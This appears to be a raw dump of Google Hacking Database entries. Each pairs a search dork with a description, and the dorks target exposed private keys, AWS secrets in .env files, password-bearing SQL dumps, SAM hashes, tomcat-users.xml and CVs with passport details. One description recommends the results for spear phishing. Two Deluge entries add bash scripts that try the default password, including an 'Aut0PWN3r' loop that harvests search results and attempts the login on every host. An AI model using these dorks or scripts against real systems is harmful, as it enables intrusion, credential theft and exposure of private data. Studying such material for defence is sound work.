{"dork": "inurl:composer.json filetype:json -site:github.com", "description": "To find out the php packages and their versions used within a website using\r\nthe composer dependency manager config file, composer.json\r\n\r\nThanks\r\nVishnu Santhosh"}, {"dork": "intext:Server.MapPath(\".mdb\") ext:asp", "description": "Dork: intext:Server.MapPath(\".mdb\") ext:asp\r\nAbove Dork will show source code of asp file which contain path to local database. Most of these databases contain Admin/User credentials. \r\n\r\nThanks\r\nAamir Rehman"}, {"dork": "intext:\"Set objConn=Server.CreateObject(\"ADODB.Connection\")\" ext:asp", "description": "intext:\"Set objConn=Server.CreateObject(\"ADODB.Connection\")\" ext:asp\r\n\r\n\r\nAbove Dork will show source code of asp file, Most of them contains path to local database.\r\n\r\nThanks\r\nAamir Rehman"}, {"dork": "\"Do not distribute\" (ext:pdf | ext:doc | ext:docx | ext:rtf)", "description": "Finds confidential documents with the \"DO NOT DISTRIBUTE\" tag\r\n\r\nDxtroyer"}, {"dork": "\"Start of NVIDIA bug report log file\" ext:log", "description": "Finds NVIDIA bug reports, containing juicy info about the computer,\r\nincluding settings\r\n\r\nDxtroyer"}, {"dork": "\"OTL Extras logfile created on:\" ext:txt", "description": "Finds OTL Extras scan logs, containing valuable info about the host\r\n\r\nDxtroyer"}, {"dork": "intext:----- Begin SAP License ----- ext:txt", "description": "hope it's hellpful to find sap license files :)\r\n\r\ndork: intext:----- Begin SAP License ----- ext:txt"}, {"dork": "ext:pdf intext:\"Category: Password Management: Hardcoded Password\" intext:\"Issues)\"", "description": "Google Dork: Files Containing Juicy Info\r\nFinds Fortify scan reports which contains source code vulnerabilities.\r\n\r\nHuijun Chen"}, {"dork": "intitle:\"Chorus 2 - Kodi web interface\"", "description": "Shout out to TorrentFreak (https://torrentfreak.com/is-your-kodi-setup-being-spied-on-180101/)\r\n\r\nintitle:\"Chorus 2 - Kodi web interface\""}, {"dork": "intitle:Kodi inurl:\":8080\" \"Music. Music;\"", "description": "Shout out to TorrentFreak (https://torrentfreak.com/is-your-kodi-setup-being-spied-on-180101/)\r\n\r\nintitle:Kodi inurl:\":8080\" \"Music. Music;\""}, {"dork": "intitle:\"rutorrent v3\" AND intext:Uploaded -github.com", "description": "intitle:\"rutorrent v3\" AND intext:Uploaded -github.com\r\n\r\n\r\n- - - \r\n\r\n## Other Work\r\n\r\n- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/\r\n- Deluge v1 ~ https://www.exploit-db.com/ghdb/4741/\r\n- Deluge v2 ~ https://www.exploit-db.com/ghdb/4742/"}, {"dork": "inurl:\"test/php/test.html\" Plesk File", "description": "Description: This dork finds phpinfo file with Juicy Information about\r\nPlesk systems."}, {"dork": "\"SiteBar Bookmark Manager\" inurl:index.php?w=", "description": "Dashboards of SiteBar.\r\nEnjoy healthy!!!.\r\nDork by Rookit_Pentester."}, {"dork": "intitle:\"PHP Web Stat - Sysinfo\" intext:php inurl:stat/sysinfo.php", "description": "This dork list all server statistics , hardware details and installed\r\nsoftware details because of exposed phpsysinfo script"}, {"dork": "\"Email delivery powered by Google\" ext:pdf OR ext:txt", "description": "Dork for use to read mails of subscribtions and other juice data.\r\n\r\nDork for Rootkit_Pentester.\r\nRegards."}, {"dork": "intitle:index.of intext:zc_install intitle:zen-cart", "description": "Dork: *intitle:index.of intext:zc_install intitle:zen-c*art\r\n\r\nSummary:\r\n\r\nA Google dork that gives the information about target database and source\r\ncode. *Dork discovered by:* Sachin Wagh (@tiger_tigerboy)"}, {"dork": "inurl:module=coreHome", "description": "Piwik web analytics shows statistics for web servers including who is\r\nvisiting the site, what pages they visit, number of hits, referrers, and\r\nmore.\r\n\r\n-batgab"}, {"dork": "inurl:\"main.php?action=db\"", "description": "This dork will find installations of MySQLDumper (http://www.mysqldumper.de/)\r\nwhich by default are unprotected. This allows full databse acces. Use\r\nresposible and ethical!\r\n\r\nDork by _palone."}, {"dork": "allintitle:\"Forum Post Assistant :\" ext:php -site:joomla.org", "description": "allintitle:\"Forum Post Assistant :\" ext:php -site:joomla.org\r\n\r\nThe above dork will open joomla forum assistant. Which discloses alot of information like;DB name, DB version, Server internal path , PHP version, Platform, Kernal version, Enabled PHP Extensions etc.\r\n\r\nAamir Rehman"}, {"dork": "\"[LocalizedFileNames]\" inurl:\"desktop.ini\" ext:ini -git -wiki", "description": "Finds desktop.ini files which have lists of shortcuts on the desktop. Often\r\ndifferent software, including insecure software, creates desktop shortcuts.\r\nYou can use this to find different software running on the server.\r\n\r\nDxtroyer"}, {"dork": "\"[Tera Term]\" inurl:\"teraterm.ini\" ext:ini -git", "description": "Finds Tera Term configuration files, containing juicy information about the\r\nSSH server\r\n\r\nDxtroyer"}, {"dork": "inurl:\"plesk-stat\"", "description": "Author: Cr33pb0y\r\n\r\nDescription: This dork shows server stadistitics and posibly pages paths\r\nand juicy information about users behaviour."}, {"dork": "inurl:\"/xmlrpc.php?rsd\" & ext:php", "description": "This dork show results which have sensitive information about xmlrpc.php of\r\nCMS Wordpress site.\r\n\r\nManhNho"}, {"dork": "allinurl:awstats.pl?config=", "description": "Using this dork, one will be able to find the web statistics for the server\r\nincluding who is visiting this site, which pages are frequented, error\r\ncodes and much more.\r\n\r\n*Nishaanth Guna*\r\nSecurity Researcher, *Appknox https://www.appknox.com/*"}, {"dork": "inurl:/fantastico_fileslist.txt + ext:txt", "description": "inurl:/fantastico_fileslist.txt + ext:txt\r\n\r\nThis dork show results which have fantastico_fileslist.txt\r\nThis file contains a list of all the files from the current directory. The\r\ncontents of this file may expose sensitive information to an attacker.\r\n\r\nManhNho"}, {"dork": "ext:pem \"PRIVATE KEY\" -site:facebook.com -example -test*", "description": "Locate private keys that are publicly accessible.\r\n\r\nYou can also look use filetype:pem to search instead.\r\n\r\nOther file types that may represent keys include:\r\n.p12\r\n.pki\r\n.crt\r\n.key\r\n\r\nLooking for the term \"PRIVATE KEY\" will look for the typical \"BEGIN RSA\r\nPRIVATE KEY\" or \"END RSA PRIVATE KEY\" but will target multiple key types\r\nand both beginning and end.\r\n\r\nRemoving site's like facebook.com reduces the number of user names that may\r\nmatch the search. Removing words like \"example\" and \"test\" removes the\r\nnumber of keys that are published on purpose for demonstrations.\r\n\r\nThis will produce a LOT of github results. If you want to look for other\r\nsites that may have accidentally published keys, add \"-site:github.com\" or\r\n\"-github\"\r\n\r\nHappy hunting.\r\n\r\n-oni49"}, {"dork": "inurl:\"/etc/fail2ban/\" + ext:conf", "description": "inurl:\"/etc/fail2ban/\" + ext:conf\r\n\r\n\r\nFail2ban config files\r\n\r\ninurl:\"/etc/fail2ban/filter.d/\" + ext:conf\r\n\r\nFail2ban filter.d config files\r\n\r\n\r\n\r\nManhNho"}, {"dork": "intext:\"Dr.Web (R) Anti-virus. Virus base add-on\" + ext:txt", "description": "intext:\"Dr.Web (R) Anti-virus. Virus base add-on\" + ext:txt\r\n\r\nDr.Web Anti-virus information\r\n\r\nManhNho"}, {"dork": "filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES", "description": "Google Dork : filetype:sql intext:password | pass | passwd intext:username\r\nintext:INSERT INTO `users` VALUES\r\n\r\nAuthor: screetsec\r\n\r\nDescription: This dork allow you to specific find file contains Username,\r\nPassword, Secret Keys and allows you to search for sql configuration file"}, {"dork": "inurl:/gravity_forms/logs ext:txt", "description": "Exposes gravity forms WordPress plugin and add-on debugging logs.\r\nThis can lead to exposure of form submission information including transaction data, PII and disclosure of plugin versions and directory structures.\r\n\r\nHappy Hunting\r\n\r\n@Shadow0pz"}, {"dork": "intitle:\"index of\" docker-compose.yml", "description": "File contains juicy info about docker containers, like DB configurations\r\nand more.\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"index of\" .env", "description": "Files containing database and sometimes email passwords\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | inurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42", "description": "inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |\r\ninurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42\r\n\r\nPHP reveals potentially sensitive information via certain HTTP requests\r\nthat contain specific QUERY strings\r\n\r\nManhNho"}, {"dork": "intitle:\"Proberv0.\" | inurl:/proberv.php", "description": "intitle:\"Proberv0.\" | inurl:/proberv.php\r\n\r\nReveals a lot of sensitive information via Proberv.php\r\n\r\nManhNho"}, {"dork": "intitle:\"index of\" intext:\"pip-selfcheck.json\"", "description": "Description :\r\nPython virtual environment indexes.\r\n\r\nDork : intitle:\"index of\" intext:\"pip-selfcheck.json\"\r\n\r\nAuthor:\r\nVipin Joshi ( @vocuzi )"}, {"dork": "intitle:\"index of\" inurl:\"paypal\" log", "description": "Juicy info regarding PayPal accounts, Server configurations related to\r\nPayPal payments and other sensitive files related to it.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intext:database inurl:\"laravel.log\" ext:log", "description": "Juicy info in Laravel logs giving database names, usernames, php functions\r\nand so on\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "dwsync.xml intitle:index of -gitlab -github", "description": "Dreamweaver sync file which sometimes gives aways paths and names of\r\nsensitive files\r\n\r\n\r\nBruno Schmid"}, {"dork": "allinurl:mc4wp-debug.log ext:log", "description": "Dork: Mail Chimp log.\r\n\r\nEnjoy.\r\nDork by Rootkit Pentester!."}, {"dork": "config.yaml intitle:\"index of\" vagrantfile", "description": "Juicy info from puppet\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intext:\"[***] Results from\" + ext:txt + \"snort-\"", "description": "intext:\"[***] Results from\" + ext:txt + \"snort-\"\r\n\r\nShow interested Snort rules\r\n\r\nManhNho"}, {"dork": "CakePHP filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values", "description": "This dork allow you to specific find file contains Username,\r\nPassword, Secret Keys and allows you to search for sql configuration file.\r\n\r\n\r\nThanks\r\nArya Usha"}, {"dork": "intitle:\"Deluge: Web UI 1.3\"", "description": "GoogleDork v1 ~ `intitle:\"Deluge: Web UI 1.3\" `\r\nGoogleDork v2 ~ `intitle:\"Deluge: Web UI 1.3\" Filters. Status; Details; Files; Peers; Options. Downloaded: Uploaded:`\r\n\r\nDefault password: `deluge` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\nDefault port: `8112` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\n\r\n- - - \r\n\r\n## Bash\r\n\r\n```\r\nurl=\"http://target.com:8112/json\"\r\npass=\"deluge\"\r\n\r\nreq=$( curl \\\r\n -s \\\r\n --header 'Content-Type: application/json' \\\r\n --data '{\"method\":\"auth.login\",\"params\":[\"'${pass}'\"],\"id\":1}' \\\r\n --compressed \\\r\n \"${url}\" )\r\n\r\necho ${req} | grep -q '\"result\": true' \\\r\n && echo 'w000h000!' \\\r\n || echo 'b00'\r\n```\r\n\r\n- - - \r\n\r\n## Aut0PWN3r\r\n\r\n//brew install googler//\r\n\r\n```\r\ngoogler \\\r\n --count 999 \\\r\n --unfilter \\\r\n --json \\\r\n --noprompt \\\r\n 'intitle:\"Deluge: Web UI 1.3\" -exploit -vulnerability' \\\r\n | awk -F'\"' '/\"url\"/ {print $4}' \\\r\n > /tmp/results.txt\r\n\r\nfor x in $( cat /tmp/results.txt ); do\r\n curl \\\r\n -s \\\r\n --header 'Content-Type: application/json' \\\r\n --data '{\"method\":\"auth.login\",\"params\":[\"deluge\"],\"id\":1}' \\\r\n --compressed \\\r\n --max-time 5 \\\r\n \"${x}/json\" \\\r\n | grep -q true \\\r\n && echo \"[*] w000h000! ~ ${x}\" \\\r\n || echo \"[-] b00 ~ ${x}\"\r\ndone\r\n```\r\n\r\n- - - \r\n\r\n## Other Work\r\n\r\n- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/\r\n- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/\r\n- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/"}, {"dork": "intitle:\"Deluge: Web UI\" inurl:\":8112\"", "description": "GoogleDork v3 ~ intitle:\"Deluge: Web UI\" inurl:\":8112\" \r\n\r\nDefault password: `deluge` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\nDefault port: `8112` ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1\r\n\r\n\r\n- - - \r\n\r\n## Bash\r\n\r\n```\r\nurl=\"http://target.com:8112/json\"\r\npass=\"deluge\"\r\n\r\nreq=$( curl -s \"${url}\" \\\r\n -H 'Content-Type: application/json' \\\r\n --data-binary '{\"method\":\"auth.login\",\"params\":[\"'${pass}'\"],\"id\":1}' \\\r\n --compressed )\r\n\r\necho ${req} | grep -q '\"result\": true' \\\r\n && echo 'w000h000!' \\\r\n || echo 'b00'\r\n```\r\n\r\n- - - \r\n\r\n## Other Work\r\n\r\n- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/\r\n- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/\r\n- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/"}, {"dork": "filetype:log inurl:\"log\" \"[SERVER_SOFTWARE]\"", "description": "Plenty of juicy info\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"Index of /logs/\" \"lighttpd\"", "description": "Files Containing Juicy Info\r\n\r\nWill reveal website traffic logs of sites using lighttp. Can be used to\r\nmonitor how much traffic a website is getting and where from.\r\n\r\n*By: *edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "filetype:env intext:\"APP_ENV\"", "description": "# Exploit Title: Environment Laravel (PHP Framework) information disclosure\r\n # Google Dork: filetype:env intext:\"APP_ENV\"\r\n # Date: 05/04/2018\r\n # Contains sensitive information:\r\n username, password, mail accounts, etc.\r\n\r\n # Dork Author: Carlos E. Vieira"}, {"dork": "\"Declassified and Approved for Release by\" filetype: pdf", "description": "\"Declassified and Approved for Release by\" filetype: pdf\r\n\r\nThis dork show some interested docs of NSA,CIA,...\r\n\r\nManhNho"}, {"dork": "inurl:\"/Setup/Default.aspx\" \"mojoPortal\"", "description": "MojoPortal installation pages giving juicy info.\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"index.of.virtualbox\" -mirror -mirrors -public -ubuntu.com -edu -pub", "description": "Dorks containing full working Virtual machines images.\r\n\r\nAlso try: intitle:\"index.of.vmware\" -mirror -mirrors -public -ubuntu.com\r\n-edu -keygen -bitdowload\r\nfor some VMWare Virtual machines.\r\n\r\n\r\nBruno Schmid"}, {"dork": "ext:adr adr filetype:adr \"bookmarks.adr\"", "description": "Dorks containing Opera bookmarks, some with juicy info.\r\n\r\n\r\n\r\nBruno Schmid\r\n\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/bigdump.php\" + intitle:\"BigDump ver.\"", "description": "inurl:\"/bigdump.php\" + intitle:\"BigDump ver.\"\r\n\r\nShow \"BigDump: Staggered MySQL Dump Importer\" Page\r\n\r\nManhNho"}, {"dork": "inurl:/.well-known/security.txt", "description": "Files Containing Juicy Info\r\n\r\nThis will return a list of all indexed websites that have\r\nimplemented the proposed security.txt standard (https://securitytxt.org/).\r\nYou could use this as a way to find companies that have bug bounty programs\r\nthat will pay you for discovering vulns or exploits.\r\n\r\n*By:* edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "inurl:/daten/webyep-log.txt", "description": "Access to logs files.\r\n\r\n\r\nAuthor: Marcin W. Brz\u00f3zka\r\nhttps://www.linkedin.com/in/marcin-brz%C3%B3zka-044006162/"}, {"dork": "inurl:..//drivers/etc/ intitle:index of", "description": "Windows Host File used to map IP addresses.\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "ext:txt {\"wallet_address\" :\", \"pool_address\" : \" \", \"pool_password\" -git", "description": "ext:txt {\"wallet_address\" :\", \"pool_address\" : \" \", \"pool_password\" -git\r\n\r\nConfig.txt miners\r\n\r\nManhNho"}, {"dork": "intitle:\"Powered by Qualys SSL Labs\"", "description": "Search for the SSL security report on the server with some sensitive\r\ninformation.\r\n\r\nSang Bui"}, {"dork": "inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com -intext:\"Log in to FishEye\"", "description": "inurl:fisheye AND inurl:changelog -site:atlassian.com -site:github.com\r\n-intext:\"Log in to FishEye\"\r\n\r\nLots of interesting fisheye/crucible code commits and reviews.\r\n\r\nDec0y"}, {"dork": "inurl:\"?db_backup\" | inurl:\"dbbackup\" -site:github.com \"sql.gz\" | \"sql.tgz\" | \"sql.tar\" | \"sql.7z\"", "description": "Some database backups.\r\nChange the SQL extension for another of your choice. (db, mdb, sl3,\r\nsl2, sqlitedb) and so on...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "AndroidManifest ext:xml -github -gitlab -googlesource", "description": "AndroidManifest ext:xml -github -gitlab -googlesource\r\n\r\nAndroidManifest.xml files\r\n\r\nManhNho"}, {"dork": "filetype:env intext:AWS_SECRET", "description": ".env files having AWS keys and other juicy info\r\n\r\nAmal Jossy"}, {"dork": "filetype:env intext:mail_host + intext:bluehost", "description": ".env files with Bluehost webmail username and password used by Laravel apps\r\n\r\nAmal Jossy"}, {"dork": "filetype:gitattributes intext:CHANGELOG.md -site:github.com", "description": "*Google* dork *description: *Find gitattributes on websites other than on\r\ngithub repositories\r\n\r\n*Google Search: *filetype:gitattributes intext:CHANGELOG.md -site:github.com\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "allintitle:restricted filetype:doc site:gov", "description": "Some juicy Information\r\n\r\nAuthor: Subhash Rawat"}, {"dork": "intext:cv OR intext:curriculum vitae \"passport details\" ext:doc -template", "description": "Find CVs online containing Juicy Information\r\n\r\n\r\n\r\nTheManyHatsClub - admin@crypt.fi - @buydogs"}, {"dork": "intitle:\"This is pdfTeX, Version\"", "description": "intitle:\"This is pdfTeX, Version\"\r\n\r\npdfTeX logs information\r\n\r\nManhNho"}, {"dork": "filetype:xls | xlsx intext:software license site:.gov", "description": "Dork for juicy info.\r\nAlso try:\r\n filetype:doc | pdf intext:software license site:.gov\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:xls | xlsx intext:cisco -cisco.com site:.gov", "description": "Very nice network infrastructure info\r\n\r\nAlso try:\r\nfiletype:xls | xlsx intext:fortigate -fortinet.com site:.gov\r\nfiletype:xls | xlsx intext:bluecoat -bluecoat.com site:.gov\r\nfiletype:xls | xlsx intext:checkpoint -checkpoint.com site:.gov\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:vmware virtual site:.gov filetype:xls | xlsx | doc | pdf", "description": "Lots of info on target's virtualization environment.\r\nChange the site parameter to whatever you want or just get rid of it.\r\n\r\nAlso try:\r\n\r\nintext:vmclusters site:.gov filetype:xls | xlsx | doc | pdf\r\nintext:virtual hosts site:.gov filetype:xls | xlsx | doc | pdf\r\nintext:virtual environment site:.gov filetype:xls | xlsx | doc | pdf\r\nintext:vlan vhosts site:.gov filetype:xls | xlsx | doc | pdf\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "filetype:txt Administrator:500:", "description": "Find Windows SAM database hashes\r\n\r\n\r\nfiletype:txt Administrator:500:\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "inurl:\"root?originalDomain\"", "description": "Dorks giving up domains and hosts information\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"debug/default/view?panel=config\"", "description": "inurl:\"debug/default/view?panel=config\"\r\n\r\nThis dork will open the debug page of Yii framework. Which discloses all the requests to Yii framework, in some cases POST request contains clear text username/password, it also discloses server Phpinfo details and database queries.\r\n\r\nThanks\r\nAamir Rehman"}, {"dork": "\"air confirmation\" \"passenger(s)\"", "description": "Dork with very juicy information.\r\n\r\nRootkit Pentester."}, {"dork": "inurl:\"/p3p.xml\" | intitle: \"p3p.xml\" -github.com", "description": "inurl:\"/p3p.xml\" | intitle: \"p3p.xml\" -github.com\r\n\r\np3p.xml files\r\n\r\nManhNho"}, {"dork": "\"var miner=new CryptoLoot.Anonymous\" intext:CryptoLoot.Anonymous", "description": "This is a dork for search sites running Crypto loot miner\r\n\r\nDork : \"var miner=new CryptoLoot.Anonymous\" intext:CryptoLoot.Anonymous\r\n\r\nSMII Mondher"}, {"dork": "inurl:travis.yml tornado site:github.com", "description": "This can be used to identify the code hosted by different companies that\r\nuse Tornado Web Server.\r\n\r\nThanks,\r\nMufeed VH"}, {"dork": "inurl:nginx.conf nginx site:github.com", "description": "This dork can be used to detect codes hosted by different companies that\r\nuses NGINX Web Server.\r\n\r\nMufeed VH"}, {"dork": "intext:\"successfully\" intitle:\"index of\" config | log | logged -stackoverflow", "description": "Some juicy information.\r\nThis can contain successful events of the system like: DB changes, users\r\nactions, file & folder creation, account loggins, etc...\r\n\r\nAlso very usefull to see what kind of application the system is running.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "ext:log intext:\"connection\" intitle:\"index of\" -stackoverflow", "description": "Juicy information mainly found in log files ( WSFTP.LOG, access.log,\r\nmachttp.log, password.log)\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "employee \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx", "description": "This will give you a good insight of the targets BOS(Business Operation\r\nSoftware) and sometimes their supply chain.\r\n\r\nalso try:\r\nnewcomer \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\nhr | admin \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\n1st level support \"training\" intitle:index.of ext:doc | pdf | xls |docx\r\n|xlsx\r\n\r\nsuppervisor \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\nengineer \"training\" intitle:index.of ext:doc | pdf | xls |docx |xlsx\r\n\r\nYou can also replace \"training\" with \"exercise\" or \"education\"\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "hardware | software \"migration\" intitle:index.of ext:xls | xlsx | doc | docx | pdf", "description": "Information regarding company's IT migration process usefull to find out\r\nwhy, how and what is the target changing/migrating.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:lighttpd.conf lighttpd site:github.com", "description": "This dork can be used to detect codes hosted by different companies that\r\nuses lighttpd Web Server.\r\n\r\nAnwar Ayoob"}, {"dork": "-site:smarty.net ext:tpl intext:\"", "description": "-site:smarty.net ext:tpl intext:\""}, {"dork": "swiftmailer intitle:\"index of\" \"smtp.yml\" | \"smtp.xml\"", "description": "This dork might give passwords and server directoies with juicy info.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"config.yml\" | \"config.xml\" intext:login | auth", "description": "Dorks containing login credentials and more.\r\n\r\nYou can also try.\r\n\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:user | auth | pass\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:passwd | auth |\r\npassword\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"config.yml\" | \"config.xml\" intext:login | auth", "description": "Dorks containing login credentials and more.\r\n\r\nYou can also try.\r\n\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:user | auth | pass\r\nintitle:\"index of\" \"config.yml\" | \"config.xml\" intext:passwd | auth |\r\npassword\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \".gitignore\"", "description": "Here contains information related to what the target uses as IDE, and many\r\nother software related to development. Great for footprinting\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:APIKey ext:js | xml | yml | txt | conf | py -github -stackoverflow intitle:\"index of\"", "description": "Dork containing some API Keys from several web applications.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \".travis.yml\" | \".travis.xml\"", "description": "Juicy info\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"laravel.log\" | \"main.yaml\" | \"server.cfg\"", "description": "Juicy info which sometimes gives you good DB queries or login information\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.php.bak", "description": "inurl:login.php.bak\r\n\r\nThis Google Dork discovers badly configured servers exposing useful and \r\nsensitive information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:elmah.axd intext:\"Powered by ELMAH\" -inurl:detail", "description": "# Google Dork: \r\ninurl:elmah.axd intext:\"Powered by ELMAH\" -inurl:detail \r\n# Date: \r\n13.08.2018 \r\n# Exploit Author: \r\nNSIDE Attack Logic GmbH\r\n# Vendor Homepage: \r\nhttps://elmah.github.io/\r\n\r\n#Description:\r\nThis dorks can be used to identify public ELMAH (Error Logging Modules and Handlers) instances that provide sensitive Information, from the application path to the session token of an authenticated user."}, {"dork": "inurl:conf/tomcat-users.xml -github", "description": "inurl:conf/tomcat-users.xml -github\r\n\r\nFind some login information of apache tomcat"}, {"dork": "ext:ppk ssh key -github.com -gitlab", "description": "ext:ppk ssh key -github.com -gitlab\r\n\r\nfile contain SSH key\r\n\r\nManhNho"}, {"dork": "intext:\"PHP Version \" ext:php intext:\"disabled\" intext:\"Build Date\" intext:\"System\" intext:\"allow_url_fopen\"", "description": "Exploit Title: Finds phpinfo() pages that are not tied to extensions or file types.\r\nGoogle Dork: intext:\"PHP Version \" ext:php intext:\"disabled\" intext:\"Build Date\" intext:\"System\" intext:\"allow_url_fopen\"\r\nDate: 9-1-2018\r\nExploit Author: hehnope"}, {"dork": "inurl:/wp-content/ai1wm-backups + wpress", "description": "inurl:/wp-content/ai1wm-backups + wpress"}, {"dork": "inurl:/wp-json/wp/v2/users/ \"id\":1,\"name\":\" -wordpress.stackexchange.com -stackoverflow.com", "description": "Category: Vulnerable file\r\nMisconfiguration attack to get information of wordpress users\r\nManhNho"}, {"dork": "intext:\"define('DB_NAME',\" ext:txt", "description": "intext:\"define('DB_NAME',\" ext:txt\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nWordpress database information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intext:\"class JConfig {\" inurl:configuration.php", "description": "intext:\"class JConfig {\" inurl:configuration.php\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nJoomla configuaration information.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intitle:\"index of\" intext:twr.html", "description": "intitle:\"index of\" intext:twr.html\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nTripwire reports.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:/yum.log | intitle:yum.log + ext:log", "description": "inurl:/yum.log | intitle:yum.log + ext:log\r\n\r\nyum log files\r\n\r\nManhNho"}, {"dork": "/var/www/manage/storage/logs/laravel- ext:log", "description": "Laravel logs\r\n\r\nManhNho"}, {"dork": "inurl:robots.txt intext:Disallow: /web.config", "description": "# Google Dork: inurl:robots.txt intext:Disallow: /web.config\r\n# Description: Google Dork to find /web.config file in robots.txt\r\n# Date: 2018-09-21\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "configuration> + filetype:config -github.com", "description": "web.config file\r\n\r\nManhNho"}, {"dork": "inurl:logs/gravityforms", "description": "# Exploit Title: WordPress GravityForms Information Leak\r\n# Google Dork: inurl:logs/gravityforms\r\n# Description: Websites using gravity forms have debug logs that are\r\npublicly available. Note that some include information that has some\r\ninformation from paypal: addresses, cookies, email addresses, ip addresses.\r\n# Date: Sunday Sept. 23, 2018\r\n# Exploit Author: Dhruv Gramopadhye (dgramop)\r\n# Vendor Homepage: https://www.gravityforms.com/\r\n# Version: 2.3.2\r\n# Contact: https://dgramop.xyz\r\n\r\nVersion number estimated, future versions may be affected."}, {"dork": "intext:\"please find attached\" \"login\" | password ext:pdf", "description": "Passwords and information on target's employees/customers. awesome for\r\nspear phishing.\r\n\r\nReplace pdf extension with any other document extension like doc, docx,\r\ntxt...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:Modified files in JOE when it aborted on JOE was aborted because the terminal closed", "description": "intext:Modified files in JOE when it aborted on JOE was aborted because \r\nthe terminal closed\r\n\r\nThis Google Dork discovers servers exposing possible useful information \r\nhidden in DEADJOE files.\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "filetype:txt line vty 0 4", "description": "filetype:txt line vty 0 4\r\n\r\nDiscover Cisco Running Configuration\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "\"[HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessions]\" ext:reg", "description": "Finds PuTTY session configs, sometimes containing plaintext credentials\r\n\r\nDxtroyer"}, {"dork": "ext:env intext:APP_ENV= | intext:APP_DEBUG= | intext:APP_KEY=", "description": "*Description: 